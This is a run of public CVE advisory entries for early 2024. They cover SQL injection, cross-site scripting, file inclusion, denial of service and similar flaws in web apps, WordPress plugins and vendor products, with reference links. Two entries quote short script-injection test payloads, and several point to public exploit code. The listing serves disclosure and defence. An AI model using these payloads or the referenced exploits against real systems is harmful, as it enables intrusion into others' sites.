CVE 2024 275 Candidate A vulnerability was found in Kashipara Food Management System up to 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file item_edit_submit.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-249830 is the identifier assigned to this vulnerability. MISC:https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%204.pdf | URL:https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%204.pdf | MISC:https://vuldb.com/?ctiid.249830 | URL:https://vuldb.com/?ctiid.249830 | MISC:https://vuldb.com/?id.249830 | URL:https://vuldb.com/?id.249830 Assigned (20240106)
CVE 2024 274 Candidate A vulnerability was found in Kashipara Food Management System up to 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file billAjax.php. The manipulation of the argument item_name leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249829 was assigned to this vulnerability. MISC:https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%202.pdf | URL:https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%202.pdf | MISC:https://vuldb.com/?ctiid.249829 | URL:https://vuldb.com/?ctiid.249829 | MISC:https://vuldb.com/?id.249829 | URL:https://vuldb.com/?id.249829 Assigned (20240106)
CVE 2024 273 Candidate A vulnerability was found in Kashipara Food Management System up to 1.0. It has been classified as critical. Affected is an unknown function of the file addwaste_entry.php. The manipulation of the argument item_name leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249828. MISC:https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%203.pdf | URL:https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%203.pdf | MISC:https://vuldb.com/?ctiid.249828 | URL:https://vuldb.com/?ctiid.249828 | MISC:https://vuldb.com/?id.249828 | URL:https://vuldb.com/?id.249828 Assigned (20240106)
CVE 2024 272 Candidate A vulnerability was found in Kashipara Food Management System up to 1.0 and classified as critical. This issue affects some unknown processing of the file addmaterialsubmit.php. The manipulation of the argument material_name leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249827. MISC:https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%208.pdf | URL:https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%208.pdf | MISC:https://vuldb.com/?ctiid.249827 | URL:https://vuldb.com/?ctiid.249827 | MISC:https://vuldb.com/?id.249827 | URL:https://vuldb.com/?id.249827 Assigned (20240106)
CVE 2024 271 Candidate A vulnerability has been found in Kashipara Food Management System up to 1.0 and classified as critical. This vulnerability affects unknown code of the file addmaterial_edit.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-249826 is the identifier assigned to this vulnerability. MISC:https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%206.pdf | URL:https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%206.pdf | MISC:https://vuldb.com/?ctiid.249826 | URL:https://vuldb.com/?ctiid.249826 | MISC:https://vuldb.com/?id.249826 | URL:https://vuldb.com/?id.249826 Assigned (20240106)
CVE 2024 270 Candidate A vulnerability, which was classified as critical, was found in Kashipara Food Management System up to 1.0. This affects an unknown part of the file item_list_submit.php. The manipulation of the argument item_name leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249825 was assigned to this vulnerability. MISC:https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%201.pdf | URL:https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%201.pdf | MISC:https://vuldb.com/?ctiid.249825 | URL:https://vuldb.com/?ctiid.249825 | MISC:https://vuldb.com/?id.249825 | URL:https://vuldb.com/?id.249825 Assigned (20240106)
CVE 2024 269 Candidate ManageEngine ADAudit Plus versions 7270 and below are vulnerable to the Authenticated SQL injection in File-Summary DrillDown. This issue has been fixed and released in version 7271. MISC:https://www.manageengine.com/products/active-directory-audit/sqlfix-7271.html | URL:https://www.manageengine.com/products/active-directory-audit/sqlfix-7271.html Assigned (20240106)
CVE 2024 268 Candidate A vulnerability, which was classified as critical, has been found in Kashipara Hospital Management System up to 1.0. Affected by this issue is some unknown functionality of the file registration.php. The manipulation of the argument name/email/pass/gender/age/city leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249824. MISC:https://github.com/E1CHO/cve_hub/blob/main/Hospital%20Managment%20System/Hospital%20Managment%20System%20-%20vuln%202.pdf | URL:https://github.com/E1CHO/cve_hub/blob/main/Hospital%20Managment%20System/Hospital%20Managment%20System%20-%20vuln%202.pdf | MISC:https://vuldb.com/?ctiid.249824 | URL:https://vuldb.com/?ctiid.249824 | MISC:https://vuldb.com/?id.249824 | URL:https://vuldb.com/?id.249824 Assigned (20240106)
CVE 2024 267 Candidate A vulnerability classified as critical was found in Kashipara Hospital Management System up to 1.0. Affected by this vulnerability is an unknown functionality of the file login.php of the component Parameter Handler. The manipulation of the argument email/password leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249823. MISC:https://github.com/E1CHO/cve_hub/blob/main/Hospital%20Managment%20System/Hospital%20Managment%20System%20-%20vuln%201.pdf | URL:https://github.com/E1CHO/cve_hub/blob/main/Hospital%20Managment%20System/Hospital%20Managment%20System%20-%20vuln%201.pdf | MISC:https://vuldb.com/?ctiid.249823 | URL:https://vuldb.com/?ctiid.249823 | MISC:https://vuldb.com/?id.249823 | URL:https://vuldb.com/?id.249823 Assigned (20240106)
CVE 2024 266 Candidate A vulnerability classified as problematic has been found in Project Worlds Online Lawyer Management System 1.0. Affected is an unknown function of the component User Registration. The manipulation of the argument First Name leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-249822 is the identifier assigned to this vulnerability. MISC:https://drive.google.com/file/d/1U60z1xzBzJjalbmwBmPD5NjJ4pPaDevF/view?usp=sharing | URL:https://drive.google.com/file/d/1U60z1xzBzJjalbmwBmPD5NjJ4pPaDevF/view?usp=sharing | MISC:https://vuldb.com/?ctiid.249822 | URL:https://vuldb.com/?ctiid.249822 | MISC:https://vuldb.com/?id.249822 | URL:https://vuldb.com/?id.249822 Assigned (20240106)
CVE 2024 265 Candidate A vulnerability was found in SourceCodester Clinic Queuing System 1.0. It has been rated as critical. This issue affects some unknown processing of the file /index.php of the component GET Parameter Handler. The manipulation of the argument page leads to file inclusion. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249821 was assigned to this vulnerability. MISC:https://github.com/jmrcsnchz/ClinicQueueingSystem_RCE | URL:https://github.com/jmrcsnchz/ClinicQueueingSystem_RCE | MISC:https://github.com/jmrcsnchz/ClinicQueueingSystem_RCE/blob/main/clinicx.py | URL:https://github.com/jmrcsnchz/ClinicQueueingSystem_RCE/blob/main/clinicx.py | MISC:https://vuldb.com/?ctiid.249821 | URL:https://vuldb.com/?ctiid.249821 | MISC:https://vuldb.com/?id.249821 | URL:https://vuldb.com/?id.249821 Assigned (20240106)
CVE 2024 264 Candidate A vulnerability was found in SourceCodester Clinic Queuing System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /LoginRegistration.php. The manipulation of the argument formToken leads to authorization bypass. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249820. MISC:https://github.com/jmrcsnchz/ClinicQueueingSystem_RCE/ | URL:https://github.com/jmrcsnchz/ClinicQueueingSystem_RCE/ | MISC:https://github.com/jmrcsnchz/ClinicQueueingSystem_RCE/blob/main/clinicx.py | URL:https://github.com/jmrcsnchz/ClinicQueueingSystem_RCE/blob/main/clinicx.py | MISC:https://vuldb.com/?ctiid.249820 | URL:https://vuldb.com/?ctiid.249820 | MISC:https://vuldb.com/?id.249820 | URL:https://vuldb.com/?id.249820 Assigned (20240106)
CVE 2024 263 Candidate A vulnerability was found in ACME Ultra Mini HTTPd 1.21. It has been classified as problematic. This affects an unknown part of the component HTTP GET Request Handler. The manipulation leads to denial of service. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-249819. MISC:https://0day.today/exploit/description/39212 | URL:https://0day.today/exploit/description/39212 | MISC:https://packetstormsecurity.com/files/176333/Ultra-Mini-HTTPd-1.21-Denial-Of-Service.html | URL:https://packetstormsecurity.com/files/176333/Ultra-Mini-HTTPd-1.21-Denial-Of-Service.html | MISC:https://vuldb.com/?ctiid.249819 | URL:https://vuldb.com/?ctiid.249819 | MISC:https://vuldb.com/?id.249819 | URL:https://vuldb.com/?id.249819 | MISC:https://www.youtube.com/watch?v=HWOGeg3e5As | URL:https://www.youtube.com/watch?v=HWOGeg3e5As Assigned (20240106)
CVE 2024 262 Candidate A vulnerability was found in Online Job Portal 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /Admin/News.php of the component Create News Page. The manipulation of the argument News with the input </title><scRipt>alert(0x00C57D)</scRipt> leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-249818 is the identifier assigned to this vulnerability. MISC:https://mega.nz/file/zEsxyIYQ#re6pHT-2OGX9SNk1OpygDCQYu1RpBiOrQ_2QS6beRos | URL:https://mega.nz/file/zEsxyIYQ#re6pHT-2OGX9SNk1OpygDCQYu1RpBiOrQ_2QS6beRos | MISC:https://vuldb.com/?ctiid.249818 | URL:https://vuldb.com/?ctiid.249818 | MISC:https://vuldb.com/?id.249818 | URL:https://vuldb.com/?id.249818 Assigned (20240106)
CVE 2024 261 Candidate A vulnerability has been found in Sentex FTPDMIN 0.96 and classified as problematic. Affected by this vulnerability is an unknown functionality of the component RNFR Command Handler. The manipulation leads to denial of service. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249817 was assigned to this vulnerability. MISC:https://packetstormsecurity.com/files/176342/FTPDMIN-0.96-Denial-Of-Service.html | URL:https://packetstormsecurity.com/files/176342/FTPDMIN-0.96-Denial-Of-Service.html | MISC:https://vuldb.com/?ctiid.249817 | URL:https://vuldb.com/?ctiid.249817 | MISC:https://vuldb.com/?id.249817 | URL:https://vuldb.com/?id.249817 | MISC:https://www.youtube.com/watch?v=q-CVJfYdd-g | URL:https://www.youtube.com/watch?v=q-CVJfYdd-g Assigned (20240106)
CVE 2024 260 Candidate A vulnerability, which was classified as problematic, was found in SourceCodester Engineers Online Portal 1.0. Affected is an unknown function of the file change_password_teacher.php of the component Password Change. The manipulation leads to session expiration. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249816. MISC:https://mega.nz/file/yEsSwK6D#--ygVt0NtzhZdqVxvjaPLCYfnIeBSyf76KaRozOxfVo | URL:https://mega.nz/file/yEsSwK6D#--ygVt0NtzhZdqVxvjaPLCYfnIeBSyf76KaRozOxfVo | MISC:https://vuldb.com/?ctiid.249816 | URL:https://vuldb.com/?ctiid.249816 | MISC:https://vuldb.com/?id.249816 | URL:https://vuldb.com/?id.249816 Assigned (20240106)
CVE 2024 258 Candidate The issue was addressed with improved memory handling. This issue is fixed in tvOS 17.4, iOS 17.4 and iPadOS 17.4, macOS Sonoma 14.4, watchOS 10.4. An app may be able to execute arbitrary code out of its sandbox or with certain elevated privileges. FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/21 | FULLDISC:20240313 APPLE-SA-03-07-2024-5 watchOS 10.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/24 | FULLDISC:20240313 APPLE-SA-03-07-2024-6 tvOS 17.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/25 | MISC:https://support.apple.com/en-us/HT214081 | URL:https://support.apple.com/en-us/HT214081 | MISC:https://support.apple.com/en-us/HT214084 | URL:https://support.apple.com/en-us/HT214084 | MISC:https://support.apple.com/en-us/HT214086 | URL:https://support.apple.com/en-us/HT214086 | MISC:https://support.apple.com/en-us/HT214088 | URL:https://support.apple.com/en-us/HT214088 Assigned (20240105)
CVE 2024 256 Candidate The Starbox plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Profile Display Name and Social Settings in all versions up to, and including, 3.4.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/changeset/3029599/starbox | URL:https://plugins.trac.wordpress.org/changeset/3029599/starbox | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/0eafe473-9177-47c4-aa1e-2350cb827447?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/0eafe473-9177-47c4-aa1e-2350cb827447?source=cve Assigned (20240105)
CVE 2024 255 Candidate The WP Recipe Maker plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wprm-recipe-text-share' shortcode in all versions up to, and including, 9.1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/browser/wp-recipe-maker/trunk/includes/public/class-wprm-icon.php#L52 | URL:https://plugins.trac.wordpress.org/browser/wp-recipe-maker/trunk/includes/public/class-wprm-icon.php#L52 | MISC:https://plugins.trac.wordpress.org/changeset/3019769/wp-recipe-maker/trunk/includes/public/class-wprm-icon.php | URL:https://plugins.trac.wordpress.org/changeset/3019769/wp-recipe-maker/trunk/includes/public/class-wprm-icon.php | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/53a51408-e5d8-4727-9dec-8321c062c31e?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/53a51408-e5d8-4727-9dec-8321c062c31e?source=cve Assigned (20240105)
CVE 2024 254 Candidate The (Simply) Guest Author Name plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's post meta in all versions up to, and including, 4.34 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/browser/guest-author-name/trunk/sfly-guest-author.php | URL:https://plugins.trac.wordpress.org/browser/guest-author-name/trunk/sfly-guest-author.php | MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3027723%40guest-author-name&new=3027723%40guest-author-name&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3027723%40guest-author-name&new=3027723%40guest-author-name&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/0e9e2864-6624-497f-8bec-df8360ed3f4a?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/0e9e2864-6624-497f-8bec-df8360ed3f4a?source=cve Assigned (20240105)
CVE 2024 253 Candidate ManageEngine ADAudit Plus versions 7270 and below are vulnerable to the Authenticated SQL injection in home Graph-Data. MISC:https://www.manageengine.com/products/active-directory-audit/sqlfix-7271.html | URL:https://www.manageengine.com/products/active-directory-audit/sqlfix-7271.html Assigned (20240105)
CVE 2024 252 Candidate ManageEngine ADSelfService Plus versions 6401 and below are vulnerable to the remote code execution due to the improper handling in the load balancer component. Authentication is required in order to exploit this vulnerability. MISC:https://www.manageengine.com/products/self-service-password/advisory/CVE-2024-0252.html | URL:https://www.manageengine.com/products/self-service-password/advisory/CVE-2024-0252.html Assigned (20240105)
CVE 2024 251 Candidate The Advanced Woo Search plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the search parameter in all versions up to, and including, 2.96 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. This only affects sites when the Dynamic Content for Elementor plugin is also installed. MISC:https://plugins.trac.wordpress.org/browser/advanced-woo-search/tags/2.94/includes/class-aws-integrations.php#L2170 | URL:https://plugins.trac.wordpress.org/browser/advanced-woo-search/tags/2.94/includes/class-aws-integrations.php#L2170 | MISC:https://plugins.trac.wordpress.org/browser/advanced-woo-search/tags/2.94/includes/class-aws-integrations.php#L287 | URL:https://plugins.trac.wordpress.org/browser/advanced-woo-search/tags/2.94/includes/class-aws-integrations.php#L287 | MISC:https://plugins.trac.wordpress.org/browser/advanced-woo-search/tags/2.97/includes/class-aws-integrations.php#L2104 | URL:https://plugins.trac.wordpress.org/browser/advanced-woo-search/tags/2.97/includes/class-aws-integrations.php#L2104 | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/91358e40-e64f-4e8e-b5a3-7d2133db5fe9?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/91358e40-e64f-4e8e-b5a3-7d2133db5fe9?source=cve Assigned (20240105)
CVE 2024 250 Candidate The Analytics Insights for Google Analytics 4 (AIWP) WordPress plugin before 6.3 is vulnerable to Open Redirect due to insufficient validation on the redirect oauth2callback.php file. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action. MISC:https://wpscan.com/vulnerability/321b07d1-692f-48e9-a8e5-a15b38efa979/ | URL:https://wpscan.com/vulnerability/321b07d1-692f-48e9-a8e5-a15b38efa979/ Assigned (20240105)
CVE 2024 248 Candidate The EazyDocs WordPress plugin before 2.4.0 re-introduced CVE-2023-6029 (https://wpscan.com/vulnerability/7a0aaf85-8130-4fd7-8f09-f8edc929597e/) in 2.3.8, allowing any authenticated users, such as subscriber to delete arbitrary posts, as well as add and delete documents/sections. The issue was partially fixed in 2.3.9. MISC:https://wpscan.com/vulnerability/faf50bc0-64c5-4ccc-a8ac-e73ed44a74df/ | URL:https://wpscan.com/vulnerability/faf50bc0-64c5-4ccc-a8ac-e73ed44a74df/ Assigned (20240105)
CVE 2024 247 Candidate A vulnerability classified as critical was found in CodeAstro Online Food Ordering System 1.0. This vulnerability affects unknown code of the file /admin/ of the component Admin Panel. The manipulation of the argument Username leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-249778 is the identifier assigned to this vulnerability. MISC:https://drive.google.com/file/d/13xhOZ3Zg-XoviVC744PPDorTxYbLUgbv/view?usp=sharing | URL:https://drive.google.com/file/d/13xhOZ3Zg-XoviVC744PPDorTxYbLUgbv/view?usp=sharing | MISC:https://vuldb.com/?ctiid.249778 | URL:https://vuldb.com/?ctiid.249778 | MISC:https://vuldb.com/?id.249778 | URL:https://vuldb.com/?id.249778 Assigned (20240105)
CVE 2024 246 Candidate A vulnerability classified as problematic has been found in IceWarp 12.0.2.1/12.0.3.1. This affects an unknown part of the file /install/ of the component Utility Download Handler. The manipulation of the argument lang with the input 1%27"()%26%25<zzz><ScRiPt>alert(document.domain)</ScRiPt> leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249759. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://vuldb.com/?ctiid.249759 | URL:https://vuldb.com/?ctiid.249759 | MISC:https://vuldb.com/?id.249759 | URL:https://vuldb.com/?id.249759 Assigned (20240105)
CVE 2024 244 Candidate Buffer overflow in CPCA PCFAX number process of Office Multifunction Printers and Laser Printers(*) which may allow an attacker on the network segment to trigger the affected product being unresponsive or to execute arbitrary code.*:Satera MF750C Series firmware v03.07 and earlier sold in Japan. Color imageCLASS MF750C Series/Color imageCLASS X MF1333C firmware v03.07 and earlier sold in US. i-SENSYS MF754Cdw/C1333iF firmware v03.07 and earlier sold in Europe. MISC:https://canon.jp/support/support-info/240205vulnerability-response | URL:https://canon.jp/support/support-info/240205vulnerability-response | MISC:https://psirt.canon/advisory-information/cp2024-001/ | URL:https://psirt.canon/advisory-information/cp2024-001/ | MISC:https://www.canon-europe.com/support/product-security-latest-news/ | URL:https://www.canon-europe.com/support/product-security-latest-news/ | MISC:https://www.usa.canon.com/support/canon-product-advisories/Service-Notice-Regarding-Vulnerability-Measure-Against-Buffer-Overflow-for-Laser-Printers-and-Small-Office-Multifunctional-Printers | URL:https://www.usa.canon.com/support/canon-product-advisories/Service-Notice-Regarding-Vulnerability-Measure-Against-Buffer-Overflow-for-Laser-Printers-and-Small-Office-Multifunctional-Printers Assigned (20240105)
CVE 2024 243 Candidate With the following crawler configuration: ```python from bs4 import BeautifulSoup as Soup url = "https://example.com" loader = RecursiveUrlLoader( url=url, max_depth=2, extractor=lambda x: Soup(x, "html.parser").text ) docs = loader.load() ``` An attacker in control of the contents of `https://example.com` could place a malicious HTML file in there with links like "https://example.completely.different/my_file.html" and the crawler would proceed to download that file as well even though `prevent_outside=True`. https://github.com/langchain-ai/langchain/blob/bf0b3cc0b5ade1fb95a5b1b6fa260e99064c2e22/libs/community/langchain_community/document_loaders/recursive_url_loader.py#L51-L51 Resolved in https://github.com/langchain-ai/langchain/pull/15559 MISC:https://github.com/langchain-ai/langchain/pull/15559 | MISC:https://github.com/langchain-ai/langchain/commit/bf0b3cc0b5ade1fb95a5b1b6fa260e99064c2e22 | URL:https://github.com/langchain-ai/langchain/commit/bf0b3cc0b5ade1fb95a5b1b6fa260e99064c2e22 | MISC:https://huntr.com/bounties/370904e7-10ac-40a4-a8d4-e2d16e1ca861 | URL:https://huntr.com/bounties/370904e7-10ac-40a4-a8d4-e2d16e1ca861 Assigned (20240104)
CVE 2024 242 Candidate Under certain circumstances IQ Panel4 and IQ4 Hub panel software prior to version 4.4.2 could allow unauthorized access to settings. MISC:https://www.cisa.gov/news-events/ics-advisories/icsa-24-039-01 | URL:https://www.cisa.gov/news-events/ics-advisories/icsa-24-039-01 | MISC:https://www.johnsoncontrols.com/cyber-solutions/security-advisories | URL:https://www.johnsoncontrols.com/cyber-solutions/security-advisories Assigned (20240104)
CVE 2024 241 Candidate encoded_id-rails versions before 1.0.0.beta2 are affected by an uncontrolled resource consumption vulnerability. A remote and unauthenticated attacker might cause a denial of service condition by sending an HTTP request with an extremely long "id" parameter. MISC:https://github.com/advisories/GHSA-3px7-jm2p-6h2c | URL:https://github.com/advisories/GHSA-3px7-jm2p-6h2c | MISC:https://github.com/stevegeek/encoded_id-rails/commit/afa495a77b8a21ad582611f9cdc2081dc4018b91 | URL:https://github.com/stevegeek/encoded_id-rails/commit/afa495a77b8a21ad582611f9cdc2081dc4018b91 | MISC:https://github.com/stevegeek/encoded_id-rails/security/advisories/GHSA-3px7-jm2p-6h2c | URL:https://github.com/stevegeek/encoded_id-rails/security/advisories/GHSA-3px7-jm2p-6h2c | MISC:https://vulncheck.com/advisories/vc-advisory-GHSA-3px7-jm2p-6h2c | URL:https://vulncheck.com/advisories/vc-advisory-GHSA-3px7-jm2p-6h2c Assigned (20240104)
CVE 2024 240 Candidate A memory leak in the Silicon Labs' Bluetooth stack for EFR32 products may cause memory to be exhausted when sending notifications to multiple clients, this results in all Bluetooth operations, such as advertising and scanning, to stop. MISC:https://community.silabs.com/069Vm000001AjEfIAK | URL:https://community.silabs.com/069Vm000001AjEfIAK | MISC:https://github.com/SiliconLabs/gecko_sdk | URL:https://github.com/SiliconLabs/gecko_sdk Assigned (20240104)
CVE 2024 239 Candidate The Contact Form 7 Connector WordPress plugin before 1.2.3 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against administrators. MISC:https://wpscan.com/vulnerability/b9a4a3e3-7cdd-4354-8541-4219bd41c854/ | URL:https://wpscan.com/vulnerability/b9a4a3e3-7cdd-4354-8541-4219bd41c854/ Assigned (20240104)
CVE 2024 238 Candidate The EventON Premium WordPress plugin before 4.5.6, EventON WordPress plugin before 2.2.8 do not have authorisation in an AJAX action, and does not ensure that the post to be updated belong to the plugin, allowing unauthenticated users to update arbitrary post metadata. MISC:https://wpscan.com/vulnerability/774655ac-b201-4d9f-8790-9eff8564bc91/ | URL:https://wpscan.com/vulnerability/774655ac-b201-4d9f-8790-9eff8564bc91/ Assigned (20240104)
CVE 2024 237 Candidate The EventON WordPress plugin through 4.5.8, EventON WordPress plugin before 2.2.7 do not have authorisation in some AJAX actions, allowing unauthenticated users to update virtual events settings, such as meeting URL, moderator, access details etc MISC:https://wpscan.com/vulnerability/73d1b00e-1f17-4d9a-bfc8-6bc43a46b90b/ | URL:https://wpscan.com/vulnerability/73d1b00e-1f17-4d9a-bfc8-6bc43a46b90b/ Assigned (20240104)
CVE 2024 236 Candidate The EventON WordPress plugin before 4.5.5, EventON WordPress plugin before 2.2.7 do not have authorisation in an AJAX action, allowing unauthenticated users to retrieve the settings of arbitrary virtual events, including any meeting password set (for example for Zoom) MISC:https://wpscan.com/vulnerability/09aeb6f2-6473-4de7-8598-e417049896d7/ | URL:https://wpscan.com/vulnerability/09aeb6f2-6473-4de7-8598-e417049896d7/ Assigned (20240104)
CVE 2024 235 Candidate The EventON WordPress plugin before 4.5.5, EventON WordPress plugin before 2.2.7 do not have authorisation in an AJAX action, allowing unauthenticated users to retrieve email addresses of any users on the blog MISC:https://wpscan.com/vulnerability/e370b99a-f485-42bd-96a3-60432a15a4e9/ | URL:https://wpscan.com/vulnerability/e370b99a-f485-42bd-96a3-60432a15a4e9/ Assigned (20240104)
CVE 2024 233 Candidate The EventON WordPress plugin before 4.5.5, EventON WordPress plugin before 2.2.7 do not properly sanitise and escape a parameter before outputting it back in pages, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin MISC:https://wpscan.com/vulnerability/04a708a0-b6f3-47d1-aac9-0bb17f57c61e/ | URL:https://wpscan.com/vulnerability/04a708a0-b6f3-47d1-aac9-0bb17f57c61e/ Assigned (20240104)
CVE 2024 232 Candidate A heap use-after-free issue has been identified in SQLite in the jsonParseAddNodeArray() function in sqlite3.c. This flaw allows a local attacker to leverage a victim to pass specially crafted malicious input to the application, potentially causing a crash and leading to a denial of service. CONFIRM:https://security.netapp.com/advisory/ntap-20240315-0007/ | FEDORA:FEDORA-2024-4adf990562 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QDCMYQ3J45NHQ4EJREM3BJNNKB5BK4Y7/ | MISC:RHBZ#2243754 | URL:https://bugzilla.redhat.com/show_bug.cgi?id=2243754 | MISC:https://access.redhat.com/security/cve/CVE-2024-0232 | URL:https://access.redhat.com/security/cve/CVE-2024-0232 Assigned (20240104)
CVE 2024 230 Candidate A session management issue was addressed with improved checks. This issue is fixed in Magic Keyboard Firmware Update 2.0.6. An attacker with physical access to the accessory may be able to extract its Bluetooth pairing key and monitor Bluetooth traffic. MISC:https://support.apple.com/en-us/HT214050 | URL:https://support.apple.com/en-us/HT214050 Assigned (20240103)
CVE 2024 229 Candidate An out-of-bounds memory access flaw was found in the X.Org server. This issue can be triggered when a device frozen by a sync grab is reattached to a different master device. This issue may lead to an application crash, local privilege escalation (if the server runs with extended privileges), or remote code execution in SSH X11 forwarding environments. MISC:RHBZ#2256690 | URL:https://bugzilla.redhat.com/show_bug.cgi?id=2256690 | MISC:RHSA-2024:0320 | URL:https://access.redhat.com/errata/RHSA-2024:0320 | MISC:RHSA-2024:0557 | URL:https://access.redhat.com/errata/RHSA-2024:0557 | MISC:RHSA-2024:0558 | URL:https://access.redhat.com/errata/RHSA-2024:0558 | MISC:RHSA-2024:0597 | URL:https://access.redhat.com/errata/RHSA-2024:0597 | MISC:RHSA-2024:0607 | URL:https://access.redhat.com/errata/RHSA-2024:0607 | MISC:RHSA-2024:0614 | URL:https://access.redhat.com/errata/RHSA-2024:0614 | MISC:RHSA-2024:0617 | URL:https://access.redhat.com/errata/RHSA-2024:0617 | MISC:RHSA-2024:0621 | URL:https://access.redhat.com/errata/RHSA-2024:0621 | MISC:RHSA-2024:0626 | URL:https://access.redhat.com/errata/RHSA-2024:0626 | MISC:RHSA-2024:0629 | URL:https://access.redhat.com/errata/RHSA-2024:0629 | MISC:https://access.redhat.com/security/cve/CVE-2024-0229 | URL:https://access.redhat.com/security/cve/CVE-2024-0229 Assigned (20240103)
CVE 2024 228 Candidate ** REJECT ** This CVE ID has been rejected or withdrawn by its CVE Numbering Authority because it is a duplicate of CVE-2024-0193. Assigned (20240103)
CVE 2024 226 Candidate Synopsys Seeker versions prior to 2023.12.0 are vulnerable to a stored cross-site scripting vulnerability through a specially crafted payload. MISC:https://community.synopsys.com/s/article/SIG-Product-Security-Advisory-CVE-2024-0226-Affecting-Seeker | URL:https://community.synopsys.com/s/article/SIG-Product-Security-Advisory-CVE-2024-0226-Affecting-Seeker Assigned (20240103)
